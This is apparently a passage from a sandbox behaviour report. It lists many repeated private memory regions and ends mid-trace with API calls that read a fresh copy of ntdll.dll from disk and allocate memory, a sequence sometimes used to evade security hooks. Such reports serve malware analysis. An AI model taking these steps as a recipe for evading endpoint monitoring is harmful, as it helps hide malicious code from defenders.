= 4795 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4796 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4797 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4798 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4799 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4800 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4801 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4802 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4803 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4804 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4805 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4806 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4807 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4808 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4809 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4810 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4811 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4812 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4813 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4814 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4815 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4816 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4817 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4818 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4819 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4820 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4821 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4822 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4823 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4824 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4825 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4826 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4827 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4828 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4829 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4830 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4831 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4832 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4833 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4834 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4835 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4836 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4837 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4838 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4839 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4840 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4841 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4842 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4843 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4844 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4845 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4846 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4847 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4848 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4849 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4850 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4851 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4852 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4853 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4854 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4855 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4856 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4857 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4858 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4859 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4860 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4861 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4862 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4863 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4864 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4865 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4866 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4867 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4868 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4869 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4870 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4871 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4872 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4873 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4874 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4875 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4876 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4877 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4878 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4879 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4880 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4881 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4882 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4883 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4884 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4885 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4886 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4887 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4888 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4889 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4890 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4891 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4892 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4893 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4894 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4895 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4896 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4897 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4898 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4899 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4900 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4901 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4902 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4903 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4904 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4905 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4906 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4907 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4908 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4909 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4910 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4911 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4912 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4913 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4914 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4915 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4916 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4917 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4918 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4919 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4920 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4921 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4922 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4923 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4924 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4925 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4926 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4927 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4928 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4929 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4930 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4931 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4932 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4933 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4934 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4935 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4936 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4937 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4938 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4939 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4940 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4941 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4942 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4943 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4944 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4945 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4946 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4947 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4948 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4949 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4950 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4951 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4952 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4953 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4954 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4955 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4956 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4957 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4958 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4959 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4960 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4961 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4962 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4963 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4964 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4965 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4966 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4967 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4968 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4969 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4970 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4971 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4972 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4973 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4974 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4975 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4976 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4977 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4978 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4979 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4980 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4981 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 4982 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Thread: id = 57 os_tid = 0xf20 [0110.202] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xdf29c | out: HeapArray=0xdf29c*=0x570000) returned 0x2 [0110.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf24c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.220] NtCreateFile (in: FileHandle=0xdf26c, DesiredAccess=0x120089, ObjectAttributes=0xdf234*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf254, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf26c*=0x158, IoStatusBlock=0xdf254*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0110.232] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x57a920) returned 1 [0110.238] NtQueryInformationFile (in: FileHandle=0x158, IoStatusBlock=0xdf254, FileInformation=0xdf1ac, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf254, FileInformation=0xdf1ac) returned 0x0 [0110.249] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1788a0) returned 0xdc8020 [0110.284] NtReadFile (in: FileHandle=0x158, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf254, Buffer=0xdc8020, BufferLength=0x1784a0, ByteOffset=0xdf1c4*=0, Key=0x0 | out: IoStatusBlock=0xdf254, Buffer=0xdc8020*) returned 0x0 [0110.290] NtClose (Handle=0x158) returned 0x0 [0110.290] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x17b001) returned 0xf5d020 [0110.323] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xdc8020) returned 1 [0110.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdf240*=0x0, 